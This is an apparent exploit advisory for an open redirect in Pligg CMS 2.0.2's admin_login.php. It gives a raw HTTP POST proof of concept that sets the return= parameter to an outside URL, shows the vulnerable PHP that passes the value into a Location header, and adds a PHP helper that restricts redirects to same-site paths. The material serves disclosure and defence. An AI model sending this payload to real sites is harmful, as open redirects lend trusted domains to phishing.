# Exploit Title: Pligg CMS admin_login.php Open Redirect Vulnerability
# Google Dork: N/A
# Date: 2015/8/18
# Exploit Author: Arash Khazaei
# Vendor Homepage: pligg.com
# Software Link: https://github.com/Pligg/pligg-cms/releases/download/2.0.2/2.0.2.zip
# Version: 2.0.2 (Last Version)
# Tested on: Kali , Iceweasel Browser
# CVE : N/A
# Contact : http://twitter.com/0xClay
# Site : http://bhunter.ir
Introduction :
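Pligg CMS is a CMS written in PHP and licensed under GPL v 2.0.
An open redirect vulnerability exists in the admin_login.php file through the return= input. The supplied value is used in the Location header of the redirect (see the vulnerable code below).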
# POC :
POST /pligg-cms-master/admin/admin_login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pligg-cms-master/admin/admin_login.php?return=http://google.com
Cookie: panelState=CollapseModules; PHPSESSID=9nd8tubu0j825n9ifobfibot86
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

username=admin&password=admin&processlogin=1&return=http://google.com
=====================
Vulnerable Code :
if(strpos($_SERVER['SERVER_SOFTWARE'], "IIS") && strpos(php_sapi_name(), "cgi") >= 0){
    echo '';
    echo $main_smarty->get_config_vars('PLIGG_Visual_IIS_Logged_In') . '' . $main_smarty->get_config_vars('PLIGG_Visual_IIS_Continue') . '';
} else {
    header('Location: '.$return);
}
die;
Discovered By : Arash Khazaei
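
Hardening example (added here, not part of the original advisory and not Pligg's code or official fix): one way to constrain the return= value to a same-site path before it reaches header('Location: ...'). The helper name safe_return_target, the default target '/' and the sample paths are assumptions.

```php
<?php
// Added example (hypothetical helper, not Pligg's code or its official fix).
// Returns $return only when it is a same-site absolute path, else $default.
// The default of '/' is an assumption; use the application's own landing page.
function safe_return_target($return, $default = '/')
{
    if (!is_string($return) || $return === '') {
        return $default;
    }
    // Control characters have no place in a redirect target (CR/LF, tab, NUL).
    if (preg_match('/[\x00-\x1F\x7F]/', $return)) {
        return $default;
    }
    // Browsers treat "\" like "/", so normalise before inspecting the prefix.
    $normalised = str_replace('\\', '/', $return);
    // Require exactly one leading slash: "//host" and "/\host" are
    // scheme-relative URLs that point at another origin.
    if ($normalised[0] !== '/' || substr($normalised, 0, 2) === '//') {
        return $default;
    }
    // Defence in depth: nothing in the value may parse as a scheme or host.
    $parts = parse_url($normalised);
    if ($parts === false || isset($parts['scheme']) || isset($parts['host'])) {
        return $default;
    }
    return $normalised;
}

// In admin_login.php the redirect would then become:
//     header('Location: ' . safe_return_target($return));

// Constructed sample inputs; the first is the value used in the PoC request.
$samples = array(
    'http://google.com',
    '//google.com',
    '/\\google.com',
    "/admin/\nindex.php",
    '/admin/index.php?page=1',   // constructed local path
);
foreach ($samples as $s) {
    printf("%-28s => %s\n", json_encode($s), safe_return_target($s));
}
```

Only the last sample is returned unchanged; every other value falls back to the default target.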